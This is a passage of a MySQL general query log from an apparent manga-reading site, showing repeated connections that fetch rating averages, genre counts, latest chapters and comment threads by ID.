Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330660251 Quit 330660252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330660252 Quit 330660253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330660253 Quit 330660254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330660254 Quit 330660255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330660255 Quit 330660256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330660256 Quit 330660257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330660257 Quit 330660258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330660258 Quit 330660259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330660259 Quit 330660260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330660260 Quit 330660261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330660261 Quit 330660262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330660262 Quit 330660200 Quit 330660263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660264 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330660263 Quit 330660265 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660264 Quit 330660265 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330660266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660265 Quit 330660266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330660267 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660266 Quit 330660267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330660267 Quit 330660268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330660268 Quit 330660269 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660269 Query select * FROM chapters where manga_id = '20' order by created desc limit 1 330660270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330660270 Quit 330660271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330660271 Quit 330660272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330660269 Quit 330660272 Quit 330660273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330660273 Quit 330660274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330660274 Quit 330660275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660276 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330660276 Query select * FROM comments where parent_id = '4693' 330660275 Quit 330660276 Quit 330660278 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660278 Query select * FROM comments where parent_id = '4561' 330660277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330660277 Quit 330660278 Quit 330660279 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660279 Query select * FROM comments where parent_id = '4553' 330660279 Quit 330660280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330660280 Quit 330660281 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660281 Query select * FROM comments where parent_id = '4549' 330660282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660281 Quit 330660282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330660282 Quit 330660283 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660283 Query select * FROM comments where parent_id = '4322' 330660284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660283 Quit 330660284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330660284 Quit 330660285 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660285 Query select * FROM comments where parent_id = '4315' 330660286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330660285 Quit 330660286 Quit 330660287 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330660287 Query select * FROM comments where parent_id = '4180' 330660288 Quit 330660287 Quit 330660290 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660290 Query select * FROM comments where parent_id = '3992' 330660289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330660289 Quit 330660290 Quit 330660291 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660291 Query select * FROM comments where parent_id = '3950' 330660292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330660291 Quit 330660292 Quit 330660293 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660293 Query select * FROM comments where parent_id = '3190' 330660294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660293 Quit 330660294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330660294 Quit 330660295 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660295 Query select * FROM comments where parent_id = '3187' 330660295 Quit 330660296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330660297 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660296 Quit 330660297 Query select * FROM comments where parent_id = '3095' 330660297 Quit 330660298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660299 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330660299 Query select * FROM comments where parent_id = '2943' 330660298 Quit 330660299 Quit 330660300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660301 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330660301 Query select * FROM comments where parent_id = '2942' 330660300 Quit 330660301 Quit 330660303 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660303 Query select * FROM comments where parent_id = '2934' 330660302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330660302 Quit 330660303 Quit 330660304 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660304 Query select * FROM comments where parent_id = '2902' 330660305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330660304 Quit 330660305 Quit 330660306 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660306 Query select * FROM comments where parent_id = '2903' 330660307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330660306 Quit 330660307 Quit 330660308 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660308 Query select * FROM comments where parent_id = '2904' 330660309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330660308 Quit 330660309 Quit 330660310 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660310 Query select * FROM comments where parent_id = '2899' 330660311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330660310 Quit 330660311 Quit 330660312 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660312 Query select * FROM comments where parent_id = '2894' 330660313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330660312 Quit 330660313 Quit 330660314 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660314 Query select * FROM comments where parent_id = '2887' 330660315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330660314 Quit 330660315 Quit 330660316 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660316 Query select * FROM comments where parent_id = '2876' 330660317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330660316 Quit 330660317 Quit 330660318 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660318 Query select * FROM comments where parent_id = '2779' 330660319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330660318 Quit 330660319 Quit 330660320 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660320 Query select * FROM comments where parent_id = '2750' 330660321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330660320 Quit 330660321 Quit 330660322 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660322 Query select * FROM comments where parent_id = '2741' 330660322 Quit 330660323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330660323 Quit 330660324 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660324 Query select * FROM comments where parent_id = '2742' 330660324 Quit 330660325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660326 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330660326 Query select * FROM comments where parent_id = '2670' 330660325 Quit 330660326 Quit 330660327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660328 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330660328 Query select * FROM comments where parent_id = '2647' 330660327 Quit 330660328 Quit 330660329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660330 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330660330 Query select * FROM comments where parent_id = '2505' 330660329 Quit 330660330 Quit 330660331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330660332 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660331 Quit 330660332 Query select * FROM comments where parent_id = '2503' 330660332 Quit 330660333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330660333 Quit 330660334 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660334 Query select * FROM comments where parent_id = '2472' 330660334 Quit 330660335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330660336 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660335 Quit 330660336 Query select * FROM comments where parent_id = '2473' 330660336 Quit 330660337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660338 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330660338 Query select * FROM comments where parent_id = '2433' 330660337 Quit 330660338 Quit 330660339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660340 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330660340 Query select * FROM comments where parent_id = '2221' 330660339 Quit 330660340 Quit 330660341 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660341 Query select * FROM comments where parent_id = '2220' 330660342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330660342 Quit 330660341 Quit 330660343 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660343 Query select * FROM comments where parent_id = '1619' 330660344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330660343 Quit 330660344 Quit 330660345 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660345 Query select * FROM comments where parent_id = '1607' 330660345 Quit 330660346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660347 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330660347 Query select * FROM comments where parent_id = '1597' 330660346 Quit 330660347 Quit 330660348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330660349 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660349 Query select * FROM comments where parent_id = '1596' 330660348 Quit 330660349 Quit 330660350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330660350 Quit 330660351 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660351 Query select * FROM comments where parent_id = '1572' 330660351 Quit 330660352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660353 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330660353 Query select * FROM comments where parent_id = '1559' 330660352 Quit 330660353 Quit 330660354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660355 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330660355 Query select * FROM comments where parent_id = '1525' 330660354 Quit 330660355 Quit 330660356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330660357 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660356 Quit 330660357 Query select * FROM comments where parent_id = '1524' 330660357 Quit 330660358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660359 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330660359 Query select * FROM comments where parent_id = '1493' 330660358 Quit 330660359 Quit 330660360 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660360 Query select * FROM comments where parent_id = '1443' 330660361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660360 Quit 330660361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330660362 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660361 Quit 330660362 Query select * FROM comments where parent_id = '1439' 330660362 Quit 330660364 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660364 Query select * FROM comments where parent_id = '1412' 330660363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330660364 Quit 330660363 Quit 330660365 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660365 Query select * FROM comments where parent_id = '1406' 330660366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330660366 Quit 330660365 Quit 330660367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660368 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330660368 Query select * FROM comments where parent_id = '1403' 330660367 Quit 330660368 Quit 330660369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330660369 Quit 330660370 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660370 Query select * FROM comments where parent_id = '1380' 330660370 Quit 330660371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330660372 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660372 Query select * FROM comments where parent_id = '1374' 330660371 Quit 330660372 Quit 330660374 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660374 Query select * FROM comments where parent_id = '1375' 330660373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330660374 Quit 330660373 Quit 330660375 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660375 Query select * FROM comments where parent_id = '1373' 330660375 Quit 330660376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330660376 Quit 330660377 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660377 Query select * FROM comments where parent_id = '1372' 330660377 Quit 330660378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330660379 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660379 Query select * FROM comments where parent_id = '1357' 330660378 Quit 330660379 Quit 330660380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660381 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330660381 Query select * FROM comments where parent_id = '1355' 330660380 Quit 330660381 Quit 330660383 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660383 Query select * FROM comments where parent_id = '1345' 330660382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330660383 Quit 330660382 Quit 330660385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660384 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330660384 Query select * FROM comments where parent_id = '1302' 330660385 Quit 330660384 Quit 330660387 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330660387 Query select * FROM comments where parent_id = '1287' 330660386 Quit 330660387 Quit 330660388 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660388 Query select * FROM comments where parent_id = '1206' 330660389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330660388 Quit 330660389 Quit 330660391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660390 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330660390 Query select * FROM comments where parent_id = '958' 330660391 Quit 330660390 Quit 330660393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660392 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330660392 Query select * FROM comments where parent_id = '955' 330660393 Quit 330660392 Quit 330660394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660395 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330660395 Query select * FROM comments where parent_id = '907' 330660394 Quit 330660395 Quit 330660396 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660396 Query select * FROM comments where parent_id = '824' 330660397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330660396 Quit 330660397 Quit 330660398 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660398 Query select * FROM comments where parent_id = '811' 330660399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330660398 Quit 330660399 Quit 330660400 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660400 Query select * FROM comments where parent_id = '785' 330660400 Quit 330660401 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660401 Query select * FROM comments where parent_id = '740' 330660401 Quit 330660402 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660402 Query select * FROM comments where parent_id = '739' 330660402 Quit 330660403 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660403 Query select * FROM comments where parent_id = '723' 330660403 Quit 330660404 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660404 Query select * FROM comments where parent_id = '722' 330660404 Quit 330660405 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660405 Query select * FROM comments where parent_id = '519' 330660405 Quit 330660406 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660406 Query select * FROM comments where parent_id = '189' 330660406 Quit 330660407 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660407 Query select * FROM comments where parent_id = '188' 330660407 Quit 330660408 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660408 Query select * FROM comments where parent_id = '153' 330660408 Quit 330660409 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660409 Query select * FROM comments where parent_id = '144' 330660409 Quit 330660410 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660410 Query select * FROM comments where parent_id = '138' 330660410 Quit 330660411 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660411 Query select * FROM comments where parent_id = '127' 330660411 Quit 330660412 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660412 Query select * FROM comments where parent_id = '122' 330660412 Quit 330660413 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660413 Query select * FROM comments where parent_id = '123' 330660413 Quit 330660414 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660414 Query select * FROM comments where parent_id = '90' 330660414 Quit 330660415 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660415 Query select * FROM comments where parent_id = '72' 330660415 Quit 330660416 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660416 Query select * FROM comments where parent_id = '61' 330660416 Quit 330660417 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660417 Query select * FROM comments where parent_id = '62' 330660417 Quit 330660418 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660418 Query select * FROM comments where parent_id = '63' 330660418 Quit 330660419 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660419 Query select * FROM comments where parent_id = '58' 330660419 Quit 330660420 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660420 Query select * FROM comments where parent_id = '59' 330660420 Quit 330660421 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660421 Query select * FROM comments where parent_id = '60' 330660421 Quit 330660422 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660422 Query select * FROM comments where parent_id = '53' 330660422 Quit 330660423 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660423 Query select * FROM comments where parent_id = '54' 330660423 Quit 330660424 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660424 Query select * FROM comments where parent_id = '55' 330660424 Quit 330660425 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660425 Query select * FROM comments where parent_id = '56' 330660425 Quit 330660426 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660426 Query select * FROM comments where parent_id = '57' 330660426 Quit 330660427 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660427 Query select * FROM comments where parent_id = '47' 330660427 Quit 330660428 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660428 Query select * FROM comments where parent_id = '48' 330660428 Quit 330660429 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660429 Query select * FROM comments where parent_id = '49' 330660429 Quit 330660430 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660430 Query select * FROM comments where parent_id = '50' 330660430 Quit 330660431 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660431 Query select * FROM comments where parent_id = '51' 330660431 Quit 330660432 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660432 Query select * FROM comments where parent_id = '52' 330660432 Quit 330660433 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660433 Query select * FROM comments where parent_id = '43' 330660433 Quit 330660434 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660434 Query select * FROM comments where parent_id = '44' 330660434 Quit 330660435 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660435 Query select * FROM comments where parent_id = '45' 330660435 Quit 330660436 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660436 Query select * FROM comments where parent_id = '46' 330660436 Quit 330660437 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660437 Query select * FROM comments where parent_id = '42' 330660437 Quit 330660438 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660438 